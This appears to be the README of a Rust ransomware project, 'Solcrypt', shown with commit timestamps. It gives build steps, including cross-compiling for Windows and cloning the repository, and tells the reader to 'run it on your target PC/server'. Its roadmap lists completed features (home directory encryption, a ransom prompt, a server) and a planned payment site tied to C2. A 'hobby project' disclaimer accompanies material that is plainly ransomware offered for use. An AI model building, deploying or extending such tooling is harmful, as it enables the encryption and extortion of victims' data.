solcrypt/README.md

26 lines
660 B
Markdown
Raw Normal View History

2024-06-14 17:07:17 +03:00
# Solcrypt
A "hobby project" ransomware that isn't really meant to be used for illegal purposes.
I made this for fun, ok? Don't get me in legal trouble for it
## Setup
Arch
```
sudo pacman -S rustup
rustup default stable
2024-06-16 12:13:57 +03:00
rustup target add x86_64-pc-windows-gnu # if compiling for windows targets
2024-06-14 17:07:17 +03:00
git clone https://git.xorycode.dev/xory/solcrypt
cd solcrypt
2024-06-16 12:13:57 +03:00
bash build.sh # this builds both encryptor and decryptor
2024-06-14 17:07:17 +03:00
```
Then run it on your target PC/server
2024-06-17 16:51:10 +03:00
## Roadmap
- [x] Basic home directory encryption
- [x] Randomly generated encryption key
2024-06-30 18:47:49 +03:00
- [x] Ransom prompt?
- [x] Server
2024-07-04 20:31:51 +03:00
- [ ] Payment website
- [ ] Payment website communicating with C2
2024-06-17 16:51:10 +03:00
- [ ] Meow?